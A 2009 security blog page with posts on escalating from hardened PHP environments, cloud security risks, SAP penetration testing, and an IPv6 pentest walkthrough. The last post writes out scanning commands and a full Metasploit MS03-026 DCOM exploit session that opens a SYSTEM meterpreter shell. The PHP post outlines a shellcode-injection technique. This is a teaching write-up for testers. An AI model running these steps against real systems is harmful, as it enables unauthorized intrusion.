Monday, August 31, 2009

Escalating from PHP Hardend Environment

There are number of PHP threats and vulnerabilities which have been reported during the past few years. These include, file inclusion attacks, remote file upload vulnerability, insecure function injection (eval,create_function,preg_replace), etc. Executing malicious shellcode over vulnerable web servers is still easier but it is quiet challenging when "post exploitation" topic is highlighted.

Today many of PHP-based web servers are hardened by default and running with low privileges. Thus, it is extremely challenging for the attacker to gain full control over the server. Let's take a brief overview on common type of protection schemes used to hardened PHP environment:

1. Limit the PHP code (i.e. control each input/output)
2. Limit the PHP interpreter
3. Harden the code against buffer overflow + memory corruption
4. Limit the possibility of arbitrary code execution
5. Non-writable filesystem
6. safe_mode (disable access to configuration settings, limit access to files/directories, limit environmental variables)
7. disable_function/disable_classes (remove un-necessary functions and classes)
8. Use memory manager (malloc/mmap) to apply safe_unlink feature and three canaries (metadata,buffer(before/after)
9. Kernel-level protection with ASLR (address space layout randomization), mprotect(), Apparmor, SELinux, GRSecurity

Now take some highlights on PHP vulnerabilities and exploitable condition:

1. Caller of the PHP application can force parameter to be passed by reference

function increase($a)
{
$a++;
}
$z = 7;
// pass $z as a reference
increase(&$z);
echo $z,"\n";
?>

This happens because we are unable to disabled the internal "allow_call_time_pass_by_reference" function.

2. executor_globals() to find the interesting target, it contains list of functions/ini entries/jmp_buf but the memory position is unknown and
it changes the structure with every single PHP version.

3. To execute the user choice of code, function dl() comes in handy but it requires:
-platform independent library
-a writable directory
-enable_dl should be activated
-setting extension_dir to the shared library directory

4. Attacking under x86 linux platform:
-PHP array leaks the pDestructor pointer which points to PHP code segment
-scan until we find ELF header in memory
-once ELF header discovered, we can also find imported functions
-select the function which have been imported from libc (memcpy)
-from there we can look any function within libc and access their addresses
-address to shellcode can be written and executed
-copying shellcode into the writable text-segment and execute it

Wednesday, August 26, 2009

Cloud Computing: A Security Outlook

A 'cloud' in computing environment is the combination of Infrastructure as a service (IaaS), Platform as a Service (PaaS), and Software as a Service (SaaS) components. Well, most of us may confuse it with ASP (Application Service Provisioning) strategy, which is completely wrong. In simple terms, cloud is a virtualized, dynamically scalable, shared fabric and shared hardware solution to the users. It avoids capital expenditure (CapEx) on purchasing expensive hardware, software and other services by renting the usage from a third-party provider under SLA (Service-level Agreement). For more information, a cloud taxonomy is attached below.

When taking insights of security within Cloud Computing domain give a clear view of risks involved from consistency, interoperability, confidentiality, availability and integrity point of view, such as:

-Host visibility within cloud
-Trust Exploitation
-Data Privacy issues
-Immature logging process
-Data center tripwire
-Application security vulnerabilities
-Backdoored filesystem/virtualized operating systems/applications
-Virtualization security issues
-Content ownership/Intellectual property rights
-Cleartext data storage and transfer vs SSL/EV-SSL
-Use of weak encryption technology
-Centralized approach

Hence, before approaching any cloud computing vendor its better to investigate their policies and procedures regarding security of your company's data transactions. This can be analyzed on the following basis:

-Data segregation and use of strong encryption technology
-Data hosting location
-Recognized under industry standards and regulatory compliance.
-Disaster recovery and business continuity assurance
-Privileged access control
-Availability of resources and data
-Viability of data in case if the vendor goes out of business

A good set of cloud service can be differentiated under agility, sustainability, cost, multi-tenancy, reliability, scalability and security. Additionally, from security perspective, a 'focused penetration testing' may rest assure a vendor from any false sense of security and thus save the cost of any data loss or liability issues.

For more information on current security initiatives, visit:
[1]Cloud Security Alliance - http://www.cloudsecurityalliance.org
[2]ENISA Cloud Security Working Group - http://www.enisa.europa.eu

Wednesday, August 19, 2009

Exploiting SAP Business Platforms: The Pen-Testing Analysis

SAP simply stands for "Systems, Applications and Products in data processing". SAP as a unique business solution developer integrates range of solutions including ERP, CRM, GRC, PLM, SCM and many more. The ease of usage, implementation and market reputation has put forward a strong basis for the company (german based) worldwide. Deploying SAP solution is a bit lengthy and complex process and that's why a core security settings left default or unattended. This could results in serious exposure of the SAP platforms and flag a high risk to the organization.


SAP Basic Components

ClientID - Business unit or Corporation with unique identifier.
Transaction - A conversation between client interface and backend database.
Authorization - Users assigned roles/profiles.
ABAP - SAP high-level programming language.
Reports - A component to generate report on user requests.
Functional Modules - A set of remote or local procedures.
RFC Interface - Remote funtion call library.


SAP Security

Talking in the specific context of SAP platform, many auditors would like to harden the SAP authorization subsystem (roles and profiles). While hardening the authorization process and segregation of duties is considered vital but there is also another aspect of security which involves technical assessment of all the networked components within SAP environment. Conducting "Penetration Testing" using industry-proven methodology gives more clear outlook for security vulnerabilities and threats in the existing infrastructure. Such as, weakness in configuration may result in business frauds. The typical number of steps followed under SAP Pen-Testing are:

-Discovery (Find the target)
-Enumeration (Services running on the platform)
-Vulnerability Assessment (Check for the presence of known/unknown vulnerabilities)
-Exploitation (Try to gain administrator privileges on the defined system)

The main goal is to achieve the highest possible privileges in the production environment which can be accomplished by:

-Getting SAP Administration access
-DBA privileges
-SAP_ALL access privileges

Though obtaining any of the above access may give complete control over SAP systems.


SAP Penetration Toolkit

Following are some of the key tools necessary to assess the SAP infrastructure.

-NMap
-rsh,rlogin,rexec
-BurbSuite
-W3af
-Nessus
-JTR (John The Ripper)
-THC Hydra
-SQL Client Tools
-NFS Client Tools
-Sapyto
-Metasploit

It worth to mention that "Sapyto" is specially designed as SAP Penetration Testing Framework to cover all aspects of Pen-Testing methodology. And because it is developed in python and C, it is easier port plugins.

Countermeasures

1.Restrict connections to the SAP gateway.
2.Restrict access to shared resources. Such that, allow only internal connections.
3.Harden the configuration settings.
4.Remove/Change the default user accounts.
5.Enable "SNC" to protect against evasdropping.
6.Good password security should be enforced.
7.Access to transactions should be restricted.
8.Use SAP authorization object "S_Program" to protect report confidentiality.

Tuesday, August 11, 2009

Exploiting IPv6 Network Stack: A Pen-tester Approach

The Next-generation protocol, IP version 6, has came out nearly 11 years ago but never been used or practiced in the real world network envrionment. This lack of adoption of technology has not only left many machines in corporate networks without IPv6 implementation but also put a negative affect on networking and operating system vendors. On the other side, due to its fast growth and complexity of implementation in various firewalls and intrusion detection/prevention appliances has revealed the attack surface, as they cannot block malicious IPv6 traffic. The main purpose of this article is to demonstrate the process through which a penetration tester can assess the security of IPv6 enabled environment.

Addressing Scheme
The representation of IPv6 has changed alot from IPv4 addressing scheme. IPv6 network address consists of 128 bits or 16 bytes as a pair of four hex-digits separated by colons. This gives more wider address space and flexibility to segment the addresses accordingly. Lets take some examples to understand the inner workings of IPv6 addressing.

::1 represents loopback or localhost address (IPv4 equivalent 127.0.0.1)
::0 or :: represents ANY IPv6 address
fe80:: prefix represents link-local address
2000:: prefix represents site-local address

Attack Surface
Usually all the IPv6 network nodes are configured with at least one link-local address (fe80::). While performing this automatic configuration, a router discovery request will be sent to all IPv6 enabled routers on their broadcast addresses. Now, if any router respond back, the node will select that site-local address (2000::) for its interface. This scenario introduces a threat where there is no active IPv6 routers and the attacker takes advantage to reply with rogue address. The risk factor of such attack is higher and may cause serious damage and data leakage problems for the organization. Using the mentioned scenario, I will demonstrate the real-world attack on IPv6 network from penetration testing perspective.


1. IPv6 Network Configuration
To validate if your system is configured with IPv6 address at particular interface, execute the following command:

# ifconfig eth0 | grep inet6
inet6 addr: fe80::0102:03ff:fe04:0506/64 Scope:Link


2. Discovery and Scanning
IPv6 design introduces a new set of protocol for network discovery. It consists of ICMPv6 Neighbour Discovery and Neighbour Solicitation protocols. In order to enumerate the network hosts, we can use the "IPv6 Attack Toolkit" published by Van Hauser. This task is accomplished using "alive6" program included in the package.

# alive6 eth0
Alive: fe80:0000:0000:0000:xxxx:xxff:fexx:xxxx
Alive: fe80:0000:0000:0000:yyyy:yyff:feyy:yyyy
Found 2 systems alive

The combination of "ip" and "ping6" command can also accumulate in local IPv6 node discovery process.

# ping6 -c 3 -I eth0 ff02::1 >/dev/null 2>&1
# ip neigh | grep ^fe80
fe80::211:43ff:fexx:xxxx dev eth0 lladdr 00:11:43:xx:xx:xx REACHABLE
fe80::21e:c9ff:fexx:xxxx dev eth0 lladdr 00:1e:c9:xx:xx:xx REACHABLE


3. Service Enumeration
In order to find the open ports running specific services on target IPv6 machine. An attacker can simply use "NMap" as follows:

# nmap -6 fe80::xxxx:xxxx:xxxx:xxxx%eth0
Starting Nmap 4.68 ( http://nmap.org ) at 2008-08-27 13:57 CDT
PORT STATE SERVICE
22/tcp open ssh

The similar task can be done through Metasploit Framework's TCP port scanner which includes a complete support for IPv6 addresses.

# msfconsole
msf> use auxiliary/discovery/portscan/tcp
msf auxiliary(tcp) > set RHOSTS fe80::xxxx:xxxx:xxxx:xxxx%eth0
msf auxiliary(tcp) > set PORTSTART 1
msf auxiliary(tcp) > set PORTSTOP 10000
msf auxiliary(tcp) > run
[*] TCP OPEN fe80:0000:0000:0000:xxxx:xxxx:xxxx:xxxx%eth0:135
[*] TCP OPEN fe80:0000:0000:0000:xxxx:xxxx:xxxx:xxxx%eth0:445
[*] TCP OPEN fe80:0000:0000:0000:xxxx:xxxx:xxxx:xxxx%eth0:1025
[*] TCP OPEN fe80:0000:0000:0000:xxxx:xxxx:xxxx:xxxx%eth0:1026
[*] TCP OPEN fe80:0000:0000:0000:xxxx:xxxx:xxxx:xxxx%eth0:1027
[*] Auxiliary module execution completed


4. Exploitation
To move towards penetration stage, it is vital to determine all set of vulnerable services running on the target machine. For instance, consider the following NMap results from scanning the IPv6 Windows interface.

# nmap -6 -p1-10000 -n fe80::24c:44ff:fe4f:1a44%eth0
80/tcp open http
135/tcp open msrpc
445/tcp open microsoft-ds
554/tcp open rtsp
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
1027/tcp open IIS
1030/tcp open iad1
1032/tcp open iad3
1034/tcp open unknown
1035/tcp open unknown
1036/tcp open unknown
1755/tcp open wms
9464/tcp open unknown

As we know that Metasploit Framework supports IPv6 sockets. This allow us to use almost any auxiliary and exploit modules against IPv6 hosts same as IPv4. For the purpose of demonstration, I have used MS03-036 (Blaster) exploit to penetrate DCERPC endpoint mapper service (port 135) and get a root shell.

msf> use windows/exploit/dcerpc/ms03_026_dcom
msf exploit(ms03_026_dcom) > set RHOST fe80::24c:44ff:fe4f:1a44%eth0
msf exploit(ms03_026_dcom) > set PAYLOAD windows/meterpreter/bind_ipv6_tcp
msf exploit(ms03_026_dcom) > set LPORT 4444
msf exploit(ms03_026_dcom) > exploit
[*] Started bind handler
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:[...]
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:[...][135]
[*] Sending exploit ...
[*] The DCERPC service did not reply to our request
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (73227 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened
msf exploit(ms03_026_dcom) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM


References:

THC IPv6 Attack Toolkit - http://freeworld.thc.org/thc-ipv6/
The Metasploit Framework - http://metasploit.com
nmap - http://nmap.org/
IPv6 Site - http://www.ipv6.org/
RFC 2461 - http://www.ietf.org/rfc/rfc2461.txt